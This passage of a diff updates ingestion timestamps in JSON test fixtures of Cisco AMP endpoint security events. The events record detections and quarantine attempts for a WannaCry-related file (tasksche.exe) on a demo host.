pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6334,7 +6334,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764453700Z", + "ingested": "2021-12-14T14:40:45.520888569Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6410,7 +6410,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764457800Z", + "ingested": "2021-12-14T14:40:45.520888971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6486,7 +6486,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764462500Z", + "ingested": "2021-12-14T14:40:45.520889350Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6583,7 +6583,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764467300Z", + "ingested": "2021-12-14T14:40:45.520889806Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -6684,7 +6684,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764472800Z", + "ingested": "2021-12-14T14:40:45.520890192Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -6774,7 +6774,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764478100Z", + "ingested": "2021-12-14T14:40:45.520890597Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -6848,7 +6848,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764482100Z", + "ingested": "2021-12-14T14:40:45.520891005Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -6920,7 +6920,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764486800Z", + "ingested": "2021-12-14T14:40:45.520891438Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6996,7 +6996,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764492700Z", + "ingested": "2021-12-14T14:40:45.520891840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -7072,7 +7072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764498600Z", + "ingested": "2021-12-14T14:40:45.520892224Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -7164,7 +7164,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764503500Z", + "ingested": "2021-12-14T14:40:45.520893256Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7254,7 +7254,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764508400Z", + "ingested": "2021-12-14T14:40:45.520893663Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7344,7 +7344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764512800Z", + "ingested": "2021-12-14T14:40:45.520894113Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7434,7 +7434,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764517800Z", + "ingested": "2021-12-14T14:40:45.520894516Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7524,7 +7524,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764523900Z", + "ingested": "2021-12-14T14:40:45.520894911Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7614,7 +7614,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764527800Z", + "ingested": "2021-12-14T14:40:45.520895299Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
